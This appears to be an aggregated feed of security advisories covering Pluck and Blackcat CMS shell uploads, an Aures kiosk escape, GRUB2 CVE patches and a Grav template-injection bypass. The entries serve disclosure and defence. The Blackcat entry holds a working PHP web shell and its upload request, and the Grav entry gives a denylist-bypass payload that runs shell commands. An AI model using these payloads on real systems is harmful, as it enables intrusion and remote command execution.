Pluck version 4.7.18 appears to suffer from a remote shell upload vulnerability.

    ## Title: pluck-4.7.18 - FI + RCE.## Author: nu11secur1ty## Date: 07.19.2023## Vendor: https://github.com/pluck-cms/pluck/wiki## Software: https://github.com/pluck-cms/pluck## Reference: https://portswigger.net/daily-swig/rce## Reference: https://portswigger.net/web-security/file-upload## Description:The attacker who already has an account can upload a fake module tothe system and can execute the content from this moduleon the server. In this example, the attacker executes an info filefrom the already fake uploaded module and gets all information forthis system. This is a CRITICAL Vulnerability.The problem is that these developers are not making a strongsanitizing upload function and do not restrict the execution frominsideof the server.## Staus: HIGH Vulnerability[+]Exploit: prostak.php- - - NOTE: The attacker also can upload an EXE file, which file hecan execute or download!```php<?php// by nu11secur1ty - 2023  phpinfo();?>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/pluck/2023/pluck-4.7.18)## Proof and Exploit[href](https://www.nu11secur1ty.com/2023/07/pluck-4718-fi-rce.html)## Time spend:00:35:00

Pluck 4.7.18 Remote Shell Upload

Blackcat CMS version 1.4 suffers from a remote shell upload vulnerability.

    Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE)Application: blackcat CmsVersion: v1.4Bugs:  RCETechnology: PHPVendor URL: https://blackcat-cms.org/Software Link: https://github.com/BlackCatDevelopment/BlackCatCMSDate of found: 13.07.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr)3. upload zip file but this zip file must contains poc.php poc.php file contents <?php $a=$_GET['code']; echo system($a);?>4.Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwdPoc requestPOST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1Host: localhostContent-Length: 577Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgrAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0tiConnection: close------WebKitFormBoundaryBRByJwW3CUSHOcBTContent-Disposition: form-data; name="upload"1------WebKitFormBoundaryBRByJwW3CUSHOcBTContent-Disposition: form-data; name="userfile"; filename="poc.zip"Content-Type: application/zipPKvalsdalsfapoc.php<?php $a=$_GET['code']; echo system($a);?>blabalaboalpoc.phpblablabla------WebKitFormBoundaryBRByJwW3CUSHOcBTContent-Disposition: form-data; name="submit"Upload------WebKitFormBoundaryBRByJwW3CUSHOcBT--

Blackcat CMS 1.4 Shell Upload

A vulnerability classified as problematic has been found in Aures Komet up to 20230509. This affects an unknown part of the component Kiosk Mode. The manipulation leads to improper access controls. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The identifier VDB-235053 was assigned to this vulnerability.

**Full Disclosure mailing list archives****Aures Booking & POS Terminal - Local Privilege Escalation Vulnerability**

_From_: "info () vulnerability-lab com" <info () vulnerability-lab com>  
_Date_: Wed, 19 Jul 2023 09:14:47 +0200  

Document Title:
===============
Aures Booking & POS Terminal - Local Privilege Escalation Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get\_content.php?id=2323

Release Date:
=============
2023-07-17


Vulnerability Laboratory ID (VL-ID):
====================================
2323


Common Vulnerability Scoring System:
====================================
7.2


Vulnerability Class:
====================
Privilege Escalation


Current Estimated Price:
========================
3.000€ - 4.000€


Product & Service Introduction:
===============================
KOMET is an interactive, multifunctional kiosk and specially designed for the fast food industry. Available as a 
wall-mounted or
freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. 
The kiosk
features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D 
barcode scanner.
With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the 
possibility to
manage customer cards and promotions. Queue management can also be optimized.

(Copy of the Homepage:https://aures.com/de/komet/  )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the 
operating system of
the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh.


Affected Product(s):
====================
Aures Technologies GmbH
Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise)


Vulnerability Disclosure Timeline:
==================================
2023-05-09: Researcher Notification & Coordination (Security Researcher)
2023-07-17: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Authentication Type:
====================
Open Authentication (Anonymous Privileges)


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS 
Terminal
(Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. The security vulnerability allows 
local attackers
to bypass the kiosk mode to compromise the local file system and applications.

It is possible for local attackers to escalate out of the kiosk mode in the aures komet booking & pos terminal. Local 
attackers are
able to use the touch functionalities in the aures komet booking & pos terminal system to escalate with higher 
privileges. The security
vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with 
restricted low local
privileged access to the booking service front display are able to execute files, can unrestricted download contents or 
exfiltrate
local file-system information of the compromised windows based operating system.

No keyboard or connections are required to manipulate the service booking and payment terminal. The booking and payment 
terminal system
vulnerability requires no user user interaction to become exploited and can only be triggered by local physical device 
access.

Vulnerable Operating System(s):
\[+\] Windows 10 (IoT Enterprise)

Affected Component(s):
\[+\] Context Menu

Affected Function(s):
\[+\] Web Search
\[+\] Share (Teilen)


Proof of Concept (PoC):
=======================
The local vulnerability can be exploited by local attackers with physical device access without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to 
continue.


PoC: Sheet
Touch Display => Select Food Item => Highlight Text
=> Open Context Menu => Extend Context Menu => Web-Search
=> Browser => Local File System => Compromised!


Manual steps to reproduce the vulnerability ...
01.  First touch the monitor display to move on from standby
02.  Select an food item from the menu of immergrün (we recomment the cesar wraps)
03.  Push the information button of the selected food item
04.  Push twice via touch to mark the selected food item text
05.  Press a third time after you have marked the context by holding it down on the touch display
06.  Now the function context menu of the operating system for highlighted text appears
07.  On the context menu appearing 3 dots to extend the visible function menu
08.  Select the web-search or share function for the highlighted content in the context menu
09.  The browser of the operating system opens on the main front screen
10.1 By now you are able to download an execute executables using the browser without any blacklisting (Unrestricted 
Web Access - Download of Files)
10.2 Attackers can open websites on the fron display to manipulate the visible content (Scam & Spam - Web Messages & 
Web Context)
10.3 Attackers are able to manipulate via browser debugger the web content displayed from immergrün (Phishing - Formular 
& Banking Information)
10.4 Attackers are able to access the local file system and compromise it by reconfiguration with privileged user 
account (Local File-System - Privilege Escaltion)
10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts 
(Malware - Ransomware, Keylogger, Trojan-Banking & Co.)
10.6 Attackers are able to exfiltrate data from the local computer system using web connecting and available protocols
10.7 Attackers are able to perform man in the middle attacks from the local computer system
11.0 Successful reproduce of the security vulnerability!


Reference(s): Pictures
- 1.png (Terminal A)
- 2.png (Terminal B)
- 3.png (Escape)
- 4.png (Awareness)


Solution - Fix & Patch:
=======================
The security vulnerabilities can be patched by following steps:
1.  Disable the content menu to extend
2.  Disable the context menu
3.  Disable web-search
4.  Disable to mark text inputs & texts
5.  Disallow to open not white listed websites
6.  Disable to download files
7.  Restrict the web-browser access
8.  Disallow the file browser
9.  Disable the browser debug modus
10. Reconfigure the local firewall to allow and disallow connections
11. Change the access permission to prevent exfiltration


Security Risk:
==============
The security risk of the vulnerability in the local booking and payment terminal system is considered high.
The issue can be easily exploited by local attackers with simple interaction via the touch display.
Once compromised, the attackers can fully manipulate the computer's operating system and use it misuse
it for further simple or more complex attack scenarios.


Credits & Authors:
==================
Benjamin Mejri (Kunz)   -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Lars Guenther           -https://www.vulnerability-lab.com/show.php?user=L.+Guenther

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all 
warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of 
business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. 
Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade 
with stolen data.

Domains:        https://www.vulnerability-lab.com  ;    https://www.vuln-lab.com  ;https://www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability 
Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the 
use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, 
videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, 
modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

                                    Copyright © 2023 | Vulnerability Laboratory - \[Evolution Security GmbH\]™



--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

**Attachment: OpenPGP\_0x1554D09B2933E2FE.asc**  
_Description:_ OpenPGP public key

**Attachment: OpenPGP\_signature**  
_Description:_ OpenPGP digital signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Aures Booking & POS Terminal - Local Privilege Escalation Vulnerability** _info () vulnerability-lab com (Jul 19)_

CVE-2023-3786: Full Disclosure: Aures Booking & POS Terminal

Integer underflow in grub_net_recv_ip4_packets; A malicious crafted IP packet can lead to an integer underflow in grub_net_recv_ip4_packets() function on rsm->total_len value. Under certain circumstances the total_len value may end up wrapping around to a small integer number which will be used in memory allocation. If the attack succeeds in such way, subsequent operations can write past the end of the buffer.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 7 Jun 2022 19:04:13 +0000
From: John Haxby <john.haxby@...cle.com>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
CC: Daniel Kiper <daniel.kiper@...cle.com>
Subject: \[SECURITY PATCH 00/30\]  Multiple GRUB2 vulnerabilities - 2022/06/07
 round

\[ This message was sent to grub-devel@....org.   It's archived at.    \]
\[ https://lists.gnu.org/archive/html/grub-devel/2022-06/msg00035.html \]
\[ and the 30 individual patches are linked from there as well as in.  \]
\[ the git repo. These issues were previously brought to the.          \]
\[ linux-distros list.                                                 \]


Hi all,

This patch set contains a bundle of fixes for various security flaws discovered
in the GRUB2 during last year. The most severe ones, i.e. potentially exploitable,
have CVEs assigned and are listed at the end of this email. Additionally, the list
of CVEs contains a CVE assigned for the shim vulnerability. It has been added
for completeness.

Details of exactly what needs updating will be provided by the respective
distros and vendors when updates become available. Here \[1\] we are listing at
least some links to the messaging known at the time of this posting.

Full mitigation against all CVEs will require updated shim with latest SBAT
(Secure Boot Advanced Targeting) \[2\] data provided by distros and vendors.
This time UEFI revocation list (dbx) will not be used and revocation of broken
artifacts will be done with SBAT only. For information on how to apply the
latest SBAT revocations, please see mokutil(1). Vendor shims may explicitly
permit known older boot artifacts to boot.

Updated GRUB2, shim and other boot artifacts from all the affected vendors will
be made available when the embargo lifts or some time thereafter.

I am posting all the GRUB2 upstream patches which fix all security bugs found
and reported up until now. Major Linux distros carry or will carry soon one
form or another of these patches. Now all the GRUB2 upstream patches are in
the GRUB2 git repository \[3\] too.

I would like to thank, in alphabetical order, the following people who were working
really hard on the GRUB, shim and other things related to these issues:
 - Alec Brown (Oracle),
 - Alexander Burmashev (Oracle),
 - Andrew Cooper (Citrix),
 - Chris Coulson (Canonical),
 - D. Jared Dominguez (Red Hat),
 - Daniel Axtens,
 - Darren Kenny (Oracle),
 - Eric Snowberg (Oracle),
 - Ilya Okomin (Oracle),
 - Jagannathan Raman (Oracle),
 - Jan Setje-Eilers (Oracle),
 - Jeremiah Cox,
 - John Haxby (Oracle),
 - Julian Andres Klode (Canonical),
 - Lidong Chen (Oracle),
 - Marco A Benatto (Red Hat),
 - Marcus Meissner (SUSE),
 - Marta Lewandowska (Red Hat),
 - Michael Chang (SUSE),
 - Peter Jones (Red Hat),
 - Petr Janda (Red Hat),
 - Robbie Harwood (Red Hat),
 - Robert Truxal (Microsoft),
 - Ross Philipson (Oracle),
 - Steve McIntyre (Debian),
 - Sudhakar Kuppusamy (IBM),
 - Tamas K Lengyel (Intel),
 - Todd Cullum (Red Hat),
 - Vikram Narayanan (University of California Irvine).

We would not be able to succeed without all your hard work.

It was very big pleasure to work with you all.

Thank you!

Daniel

\[1\] Red Hat: https://access.redhat.com/security/security-updates/#/
   SUSE:    https://www.suse.com/support/kb/doc/?id=000020668

\[2\] https://github.com/rhboot/shim/blob/main/SBAT.md

\[3\] https://git.savannah.gnu.org/gitweb/?p=grub.git
   https://git.savannah.gnu.org/git/grub.git

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2021-3695 grub2: Crafted PNG grayscale images may lead to out-of-bounds write in heap
7.5/CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

A crafted 16-bit grayscale PNG image may lead to a out-of-bounds write in the
heap area. An attacker may take advantage of that to cause heap data corruption
or eventually arbitrary code execution and circumvent secure boot protections.
This issue has a high complexity to be exploited as an attacker needs to
perform some triage over the heap layout to achieve significant results, also
the values written into the memory are repeated three times in a row making
difficult to produce valid payloads.

Reported-by: Daniel Axtens

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2021-3696 grub2: Crafted PNG image may lead to out-of-bound write during huffman table handling
5/CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L

A heap out-of-bounds write may happen during the handling of Huffman tables in
the PNG reader. This may lead to data corruption in the heap space.
Confidentiality, Integrity and Availability impact may be considered Low as it's
very complex to an attacker control the encoding and positioning of corrupted
Huffman entries to achieve results such as arbitrary code execution and/or
secure boot circumvention.

Reported-by: Daniel Axtens

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2021-3697 grub2: Crafted JPEG image can lead to buffer underflow write in the heap
7.5/CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

A crafted JPEG image may lead the JPEG reader to underflow its data pointer,
allowing user controlled data to be written in heap. To be successfully
performed the attacker needs to do some triage over the heap layout and craft
an image with a malicious format and payload. This vulnerability can lead to
data corruption and eventual code execution or secure boot circumvention.

Reported-by: Daniel Axtens

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2022-28733 grub2: Integer underflow in grub\_net\_recv\_ip4\_packets
8.1/CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

A malicious crafted IP packet can lead to an integer underflow in
grub\_net\_recv\_ip4\_packets() function on rsm->total\_len value. Under certain
circumstances the total\_len value may end up wrapping around to a small integer
number which will be used in memory allocation. If the attack succeeds in such
way, subsequent operations can write past the end of the buffer.

Reported-by: Daniel Axtens

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2022-28734 grub2: Out-of-bounds write when handling split HTTP headers
7/CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H

When handling split HTTP headers, GRUB2 HTTP code accidentally moves its
internal data buffer point by one position. This can lead to a out-of-bound
write further when parsing the HTTP request, writing a NULL byte past the
buffer. It's conceivable that an attacker controlled set of packets can lead
to corruption of the GRUB2's internal memory metadata.

Reported-by: Daniel Axtens

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2022-28735 grub2: shim\_lock verifier allows non-kernel files to be loaded
6.7/CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

The GRUB2's shim\_lock verifier allows non-kernel files to be loaded on shim-powered
secure boot systems. Allowing such files to be loaded may lead to unverified
code and modules to be loaded in GRUB2 breaking the secure boot trust-chain.

Reported-by: Julian Andres Klode

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2022-28736 grub2: use-after-free in grub\_cmd\_chainloader()
6.4/CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

There's a use-after-free vulnerability in grub\_cmd\_chainloader() function. The
chainloader command is used to boot up operating systems that doesn't support
multiboot and do not have direct support from GRUB2. When executing chainloader
more than once a use-after-free vulnerability is triggered. If an attacker can
control the GRUB2's memory allocation pattern sensitive data may be exposed and
arbitrary code execution can be achieved.

Reported-by: Chris Coulson

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

CVE-2022-28737: shim: Buffer overflow when loading crafted EFI images
6.5/CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

There's a possible overflow in handle\_image() when shim tries to load and execute
crafted EFI executables. The handle\_image() function takes into account the SizeOfRawData
field from each section to be loaded. An attacker can leverage this to perform
out-of-bound writes into memory. Arbitrary code execution is not discarded in
such scenario.

Reported-by: Chris Coulson

\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*

grub-core/commands/boot.c          |  66 +++++++++++++++++++++++++++++++++++++++++++++++-------
grub-core/fs/btrfs.c               | 105 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
grub-core/fs/f2fs.c                |  58 ++++++++++++++++++++++++++++++++++++-----------
grub-core/kern/efi/sb.c            |  39 +++++++++++++++++++++++++++++---
grub-core/kern/file.c              |   2 ++
grub-core/loader/efi/chainloader.c |  46 ++++++++++++++++++++------------------
grub-core/net/dns.c                |  25 ++++++++++++++++-----
grub-core/net/http.c               |  17 +++++++++-----
grub-core/net/ip.c                 |  10 ++++++++-
grub-core/net/net.c                |  11 +++++++--
grub-core/net/netbuff.c            |  13 +++++++++++
grub-core/net/tftp.c               |   3 ++-
grub-core/normal/charset.c         |   2 ++
grub-core/video/readers/jpeg.c     | 106 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++----------------
grub-core/video/readers/png.c      | 158 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++------------------------------------------------------------------------
include/grub/loader.h              |   5 +++++
include/grub/net.h                 |   1 +
include/grub/verify.h              |   1 +
18 files changed, 501 insertions(+), 167 deletions(-)

Chris Coulson (3):
     loader/efi/chainloader: Simplify the loader state
     commands/boot: Add API to pass context to loader
     loader/efi/chainloader: Use grub\_loader\_set\_ex()

Daniel Axtens (20):
     kern/file: Do not leak device\_name on error in grub\_file\_open()
     video/readers/png: Abort sooner if a read operation fails
     video/readers/png: Refuse to handle multiple image headers
     video/readers/png: Drop greyscale support to fix heap out-of-bounds write
     video/readers/png: Avoid heap OOB R/W inserting huff table items
     video/readers/png: Sanity check some huffman codes
     video/readers/jpeg: Abort sooner if a read operation fails
     video/readers/jpeg: Do not reallocate a given huff table
     video/readers/jpeg: Refuse to handle multiple start of streams
     video/readers/jpeg: Block int underflow -> wild pointer write
     normal/charset: Fix array out-of-bounds formatting unicode for display
     net/ip: Do IP fragment maths safely
     net/netbuff: Block overly large netbuff allocs
     net/dns: Fix double-free addresses on corrupt DNS response
     net/dns: Don't read past the end of the string we're checking against
     net/tftp: Prevent a UAF and double-free from a failed seek
     net/tftp: Avoid a trivial UAF
     net/http: Do not tear down socket if it's already been torn down
     net/http: Fix OOB write for split http headers
     net/http: Error out on headers with LF without CR

Darren Kenny (3):
     fs/btrfs: Fix several fuzz issues with invalid dir item sizing
     fs/btrfs: Fix more ASAN and SEGV issues found with fuzzing
     fs/btrfs: Fix more fuzz issues related to chunks

Julian Andres Klode (1):
     kern/efi/sb: Reject non-kernel files in the shim\_lock verifier

Sudhakar Kuppusamy (3):
     fs/f2fs: Do not read past the end of nat journal entries
     fs/f2fs: Do not read past the end of nat bitmap
     fs/f2fs: Do not copy file names that are too long

**Download attachment "**signature.asc**" of type "**application/pgp-signature**" (269 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-28733: oss-security - [SECURITY PATCH 00/30] Multiple GRUB2 vulnerabilities

### Summary
The fix for SSTI using `|map`, `|filter` and `|reduce` twigs implemented in the commit [71bbed1](https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b) introduces bypass of the denylist due to incorrect return value from `isDangerousFunction()`, which allows to execute the payload prepending double backslash (`\\`) 

### Details
The `isDangerousFunction()` check in version 1.7.42 and onwards retuns `false` value instead of `true` when the `\` symbol is found in the `$name`.

```php
...
        if (strpos($name, "\\") !== false) {
            return false;
        }

        if (in_array($name, $commandExecutionFunctions)) {
            return true;
        }
...
```
Based on the code where the function is used, it is expected that any dangerous condition would return `true`
```php
    /**
     * @param Environment $env
     * @param array $array
     * @param callable|string $arrow
     * @return array|CallbackFilterIterator
     * @throws RuntimeError
     */
    function mapFunc(Environment $env, $array, $arrow)
    {
        if (!$arrow instanceof \Closure && !is_string($arrow) || Utils::isDangerousFunction($arrow)) {
            throw new RuntimeError('Twig |map("' . $arrow . '") is not allowed.');
	}
```
when `|map('\system')` is used in the malicious payload, the single backslash is dropped prior to reaching `strpos($name, '\\')` check, thus `$name` variable already has no backslash, and the command is blacklisted because it reaches the  `if (in_array($name, $commandExecutionFunctions)) {` validation step. 

However if `|map('\\system')` is used (i.e. double backslash), then the `strpos($name, "\\") !== false` takes effect, and `isDangerousFunction()` returns `false` , in which case the `RuntimeError` is not generated, and blacklist is bypassed leading to code execution.

### Exploit Conditions
This vulnerability can be exploited if the attacker has access to:

1. an Administrator account, or
2. a non-administrator, user account that has Admin panel access and Create/Update page permissions

### Steps to reproduce

1. Log in to Grav Admin using an administrator account.
2. Navigate to `Accounts > Add`, and ensure that the following permissions are assigned when creating a new low-privileged user: 
    - Login to Admin - Allowed
    - Page Update - Allowed
3. Log out of Grav Admin
4. Login using the account created in step 2.
5. Choose `Pages -> Home`
6. Click the `Advanced` tab and select the checkbox beside `Twig` to ensure that Twig processing is enabled for the modified webpage.
7. Under the `Content` tab, insert the following payload within the editor:
```{{ ['id'] | map('\\system') | join() }}```
8. Click the `Preview` button. Observe that the output of the id shell command is returned in the preview.

### Mitigation

```diff
diff --git a/system/src/Grav/Common/Utils.php b/system/src/Grav/Common/Utils.php
index 2f121bbe3..7b267cd0f 100644
--- a/system/src/Grav/Common/Utils.php
+++ b/system/src/Grav/Common/Utils.php
@@ -2069,7 +2069,7 @@ abstract class Utils
         }
 
         if (strpos($name, "\\") !== false) {
-            return false;
+            return true;
         }
 
         if (in_array($name, $commandExecutionFunctions)) {
                                                                         
```



**Summary**

The fix for SSTI using |map, |filter and |reduce twigs implemented in the commit 71bbed1 introduces bypass of the denylist due to incorrect return value from isDangerousFunction(), which allows to execute the payload prepending double backslash (\\)

**Details**

The isDangerousFunction() check in version 1.7.42 and onwards retuns false value instead of true when the \ symbol is found in the $name.

...
        if (strpos($name, "\\\\") !== false) {
            return false;
        }

        if (in\_array($name, $commandExecutionFunctions)) {
            return true;
        }
...

Based on the code where the function is used, it is expected that any dangerous condition would return true

    /\*\*
     \* @param Environment $env
     \* @param array $array
     \* @param callable|string $arrow
     \* @return array|CallbackFilterIterator
     \* @throws RuntimeError
     \*/
    function mapFunc(Environment $env, $array, $arrow)
    {
        if (!$arrow instanceof \\Closure && !is\_string($arrow) || Utils::isDangerousFunction($arrow)) {
            throw new RuntimeError('Twig |map("' . $arrow . '") is not allowed.');
	}

when |map('\system') is used in the malicious payload, the single backslash is dropped prior to reaching strpos($name, '\\') check, thus $name variable already has no backslash, and the command is blacklisted because it reaches the if (in_array($name, $commandExecutionFunctions)) { validation step.

However if |map('\\system') is used (i.e. double backslash), then the strpos($name, "\\") !== false takes effect, and isDangerousFunction() returns false , in which case the RuntimeError is not generated, and blacklist is bypassed leading to code execution.

**Exploit Conditions**

This vulnerability can be exploited if the attacker has access to:

1.  an Administrator account, or
2.  a non-administrator, user account that has Admin panel access and Create/Update page permissions

**Steps to reproduce**

1.  Log in to Grav Admin using an administrator account.
2.  Navigate to Accounts > Add, and ensure that the following permissions are assigned when creating a new low-privileged user:
    *   Login to Admin - Allowed
    *   Page Update - Allowed
3.  Log out of Grav Admin
4.  Login using the account created in step 2.
5.  Choose Pages -> Home
6.  Click the Advanced tab and select the checkbox beside Twig to ensure that Twig processing is enabled for the modified webpage.
7.  Under the Content tab, insert the following payload within the editor:  
    {{ ['id'] | map('\\system') | join() }}
8.  Click the Preview button. Observe that the output of the id shell command is returned in the preview.

**Mitigation**

diff --git a/system/src/Grav/Common/Utils.php b/system/src/Grav/Common/Utils.php
index 2f121bbe3..7b267cd0f 100644
\--- a/system/src/Grav/Common/Utils.php
+++ b/system/src/Grav/Common/Utils.php
@@ -2069,7 +2069,7 @@ abstract class Utils
         }
 
         if (strpos($name, "\\\\") !== false) {
\-            return false;
+            return true;
         }
 
         if (in\_array($name, $commandExecutionFunctions)) {
                                                                         

**References**

*   GHSA-9436-3gmp-4f53
*   https://nvd.nist.gov/vuln/detail/CVE-2023-37897
*   getgrav/grav@71bbed1
*   getgrav/grav@b4c6210

GHSA-9436-3gmp-4f53: grav Server-side Template Injection (SSTI) mitigation bypass

PaulPrinting CMS suffers from persistent cross site scripting vulnerabilities.

Document Title:  
===============  
